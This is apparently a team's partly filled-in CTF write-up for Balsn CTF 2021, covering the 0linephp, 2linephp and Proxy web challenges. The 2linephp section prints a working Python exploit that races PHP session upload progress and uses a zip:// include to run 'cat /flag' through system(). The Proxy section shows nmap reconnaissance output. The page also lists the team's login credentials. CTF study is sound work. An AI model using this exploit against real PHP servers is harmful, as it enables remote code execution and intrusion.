# Balsn CTF Writeup ###### tags: `pentest log` - contributer: [name=宏儒， <fill your name here>] > 這是一個自由的環境，請各位不要拘束，暢所欲言～盡情使用markdown 語法將想法與過程寫成writeup，有任何為題也可以提出來交流，我們不是專業的，所以志在參加不在得獎，別有太多壓力，但願透過brain storming與技術交流讓彼此成長，一次比一次更強！ ``` Goto: https://balsnctf.com/challenges And login teamname/pass: HollyBug/HollyBug ``` ## Table of Content [Toc] ## Problem 1: 0linephp ###### tags: `Web` 2linephp is still too hard for me :( Try this even more easier challenge - 0linephp http://0linephp0.balsnctf.com http://0linephp1.balsnctf.com Attachment: - 0linephp.zip ### Env Setup ```shell= $ sudo docker-compose up WARNING: Found orphan containers (dist_web_1) for this project. If you removed or renamed this service in your compose file, you can run this command with the --remove-orphans flag to clean it up. Building apache Step 1/2 : FROM httpd:2.4.48 2.4.48: Pulling from library/httpd a330b6cecb98: Pull complete 14e3dd65f04d: Pull complete fe59ad2e7efe: Pull complete 2cb26220caa8: Pull complete 3138742bd847: Pull complete Digest: sha256:af1199cd77b018781e2610923f15e8a58ce22941b42ce63a6ae8b6e282af79f5 Status: Downloaded newer image for httpd:2.4.48 ---> f34528d8e714 Step 2/2 : RUN echo 'Include conf/extra/proxy-php.conf' >> /usr/local/apache2/conf/httpd.conf ---> Running in cf39376a29a7 Removing intermediate container cf39376a29a7 ---> 40e29a886e54 ``` Then we go to check the website by the given url:  Apparently, it's a blank page. ### Enumeration ### Vulnerability Analysis ### Exploit --- ## Problem 2: 2linephp ###### tags: `Web` 2linephp 0CTF 1linephp is too hard. Try this super easy warmup challenge - 2linephp http://2linephp1.balsnctf.com:50080/ http://2linephp2.balsnctf.com:50080/ Attachment: - 2linephp.zip ### Env Setup ```shell= $ sudo docker build -t ctf_2linephp . --no-cache $ sudo docker images REPOSITORY TAG IMAGE ID CREATED SIZE ctf_2linephp latest 363baab6f993 52 seconds ago 432MB $ sudo docker run ctf_2linephp AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message ......snip..... OR $ chmod +x restart.sh $ sudo ./restart.sh [sudo] password for steve: Removing network dist_default WARNING: Network dist_default not found. Creating network "dist_default" with the default driver Building web Step 1/8 : FROM php:7.4.11-apache ---> fb9212e0da7b Step 2/8 : RUN sed -i 's/deb.debian.org/mirror.sjtu.edu.cn/g' /etc/apt/sources.list && sed -i 's/security.debian.org/mirror.sjtu.edu.cn/g' /etc/apt/sources.list && apt-get update -y && apt-get install gcc -y ---> Using cache ``` ### Enumeration After the environment setup, enter the url mention above: http://2linephp2.balsnctf.com:50080/ or http://2linephp1.balsnctf.com:50080/. You will see:  It's php in version of 4.7.11, what now??? ~~Help~~~ :::info <?php ($_=$_SERVER['REQUEST_URI']) && (stripos($_,"zip") !== FALSE || stripos($_,"p:") || stripos($_,"s:")) && die("Bad hacker!"); ($_=@$_GET['kaibro'].'.php') && @substr(file($_)[0],0,5) === '<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.php'); ::: ### Vulnerability Analysis ``` root@ab22ff82a040:/var/www/html# cat /flag BALSN{fake flag} ``` Since no clue from the php I turn my focus onto the problem hint: > 0CTF 1linephp is too hard. > Try this super easy warmup challenge - 2linephp So I do some research on 0CTF 1linephp, and how other people solve it. Then I saw others wrote a [python script](https://ctftime.org/writeup/29121) to run socket connect to php. I alter some detail. ```python= import requests import socket port = 50080 php_session_id = "dd9c6236c439f75b78cf6ef8d1efca31" payload = b"ccl_PK\x03\x04\x14\x00\x00\x00\x08\x00\xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x1c\ x00include.phpUT\t\x00\x03-<\xd5`-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00s\xb0\xb1 /\xc8(PHM\xce\xc8WP\x89ww\r\x896\x88\xd5\x800\x0cc5\xad\xb9\x00PK\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\ xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\ x14\x00\x00\x00include.phpUT\x05\x00\x03-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00PK\x05\ x06\x00\x00\x00\x00\x01\x00\x01\x00Q\x00\x00\x00v\x00\x00\x00\x00\x00" def exp(): res = requests.get( f"http://2linephp1.balsnctf.com:50080/", params={ "yxxx": f"zip:///tmp/sess_{php_session_id}#include", "0": "system", "1": "cat /flag", }, ) print(res.text) def build_http_request_packet(req: requests.PreparedRequest): packet = b"" packet += f"{req.method} {req.path_url} HTTP/1.1\r\n".encode() for header, value in req.headers.items(): packet += f"{header}: {value}\r\n".encode() packet += b"\r\n" if req.body is not None: if "Content-Length" in req.headers: if type(req.body) is str: packet += req.body.encode() else: packet += req.body else: for part in req.body: packet += f"{len(part):x}\r\n".encode() packet += f"{part}\r\n".encode() packet += b"0\r\n\r\n" return packet def do_so(): req = requests.Request( "POST", f"http://2linephp1.balsnctf.com:50080/", headers={"Host": f"http://2linephp1.balsnctf.com:50080/"}, cookies={"PHPSESSID": php_session_id}, data={ "PHP_SESSION_UPLOAD_PROGRESS": payload, }, files={"file": ("simple.txt", b"ccl" * 4096)}, ) packet = build_http_request_packet(req.prepare()) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("2linephp1.balsnctf.com", port)) s.sendall(packet[:-8]) exp() s.sendall(packet[-8:]) s.close() if __name__ == "__main__": do_so() ``` Some parameter need be alter, especially php_session_id and paylaod ### Exploit ### Reference [Writeup of 0ctf-2021/1linephp](https://github.com/waderwu/My-CTF-Challenges/blob/master/0ctf-2021/1linephp/writeup/1linephp_writeup_en.md) [Another writeup of 1linephp](https://blog.maple3142.net/2021/07/05/0CTF-2021-quals-writeups/#web) --- ## Problem 3: Proxy ### Enumeration ``` $ dig proxy.balsnctf.com +noall +answer 130 ⨯ proxy.balsnctf.com. 300 IN A 34.81.156.12 $ sudo nmap -Pn -sV -A 34.81.156.12 [sudo] password for song856854132: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 00:22 CST Nmap scan report for 12.156.81.34.bc.googleusercontent.com (34.81.156.12) Host is up (0.017s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http istio-envoy | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: | HTTP/1.1 400 Bad Request | content-length: 0 | connection: close | FourOhFourRequest: | HTTP/1.1 426 Upgrade Required | date: Sat, 20 Nov 2021 08:22:55 GMT | server: istio-envoy | content-length: 0 | GetRequest: | HTTP/1.1 426 Upgrade Required | date: Sat, 20 Nov 2021 08:22:42 GMT | server: istio-envoy | content-length: 0 | HTTPOptions: | HTTP/1.1 426 Upgrade Required | date: Sat, 20 Nov 2021 08:22:47 GMT | server: istio-envoy |_ content-length: 0 |_http-server-header: istio-envoy |_http-title: Site doesn't have a title (text/html; charset=utf-8). 443/tcp closed https 3389/tcp closed ms-wbt-server ``` ### Vulnerability Analysis ::: spoiler Envoy Heap Overflow Explaination 1 2 3 4 5 6 7 ::: ### Exploit ### Reference [Envoy Offical Blog: Exploiting an Envoy heap vulnerability](https://blog.envoyproxy.io/exploiting-an-envoy-heap-vulnerability-96173d41792) --- ## Problem 4: ### Enumeration ### Vulnerability Analysis ### Exploit --- ## Problem 5: ### Enumeration ### Vulnerability Analysis ### Exploit --- ## Problem 6: ### Enumeration ### Vulnerability Analysis ### Exploit